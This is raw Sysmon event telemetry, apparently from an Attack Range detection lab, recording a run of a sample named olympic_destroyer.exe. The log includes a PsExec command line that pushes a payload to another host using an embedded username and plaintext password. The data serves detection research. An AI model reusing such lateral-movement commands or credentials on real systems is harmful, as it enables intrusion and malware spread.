11:07:12.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.323{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.001{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D89781B9631F4B98FAC8E67D0E8713B6,SHA256=FC1F2DD105149BA4A6E9E6F586DEF4BF71B300C0485A86C7516181DFDF01336E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:13.756{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA40C3A7C8C221492F7ECD952A3186C9,SHA256=39E3376A7CFE10C7AF343B684ED9CE4EB1E045B65AC95D56F356B67868207061,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:11.637{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49246-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:13.018{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21566DCF703B1DD32ECA768510685795,SHA256=6B2433FCBE18D1ACCEA857CAB41324A333B04BF711DF9E9C2BE9D82A47BBFAC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:14.912{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8451DAD16618105253E56B4BE386F317,SHA256=B096294DD9BF8DBE9D2894D500B2201EFE342E41D703F7E7DB7601514CF7EF3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:14.019{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2892C8B1E7393CD84240D3F5D103917,SHA256=8FC7F0C1FDBBAE1446C1839F4709AD6A947D5FC0BF953A8291DB77DEEC91FFFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:12.010{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx65019-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:15.927{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DB7B90B5FF07A32A5609F4AEFA67EC,SHA256=A36BDCDF00191447C6F30AA2689D0D326C7C34DCE78B9CE266178FD08FD78C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:15.240{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A9523E081243E4E0FFDCFFEBA509F1B,SHA256=B83BC3FA41D5BAE061CDAB6E05741057CAAC4C5771FE55D9EFBA6788CCDA883C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:15.034{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAF9DE53937D1A5D673ED65D9A97A4C5,SHA256=CA4B817AC7952AD60CEA7329C1E62C900AE555ECB20D9523CC6826ADC58F77EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:16.959{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EC4283B2F2FD0318FA6824E6FC3453,SHA256=D6CC15A897BF19EF0A9A25875E9AEA630368A614A4E75828FC6848485F22271C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:16.050{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E5CCFD26CC99EF3592FDED947DF5D4,SHA256=AAE0EDFA5E39E2E7B9D8197BBDA432F14C5DDBA83D66DAF3BAC0FBD6CD3C18D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:17.974{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273BACA18179DDCF32CC1F4710767C97,SHA256=32DF038F2FFBF12A158784FAF0E27F3D5EFA679C9A1C056A950C6AEDCD68E646,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:15.834{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx65156-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:15.642{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51535-false10.0.1.12-8000- 23542300x8000000000000000295580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:17.069{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9CC21C4F2102F593E8CA6DB32EE9ADA,SHA256=377D2C41E3F92A122FEDEC18753ACFD3DB6C31ECE34F70FF6040439467CFFEC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:18.990{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54659C9D36017F70FE72BD4C1E6C3489,SHA256=527DA938A6DF43508B82C76F7CD4BE9D49F69E31CADD5A1E01124906CCE7DF86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:18.087{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F40469E40B2EEFC3E418D7918CCDFF4,SHA256=853CA2566EE71780911B4C5A51893DC2CA3AD64437C92BBE656251C080782EDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:18.474{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=184E598533EACD3B9011A7AA95F9B142,SHA256=11B125B2052778C78CD80E719BD39A7CA55DF9687B929F8AF8E8A578CFB9D392,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1567-6216-CD06-000000003802}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1567-6216-CD06-000000003802}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.902{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1567-6216-CD06-000000003802}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.903{C8EA50B7-1567-6216-CD06-000000003802}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000295592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:17.523{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49250-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.534{C8EA50B7-1567-6216-CC06-000000003802}71566800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.233{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1567-6216-CC06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.233{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 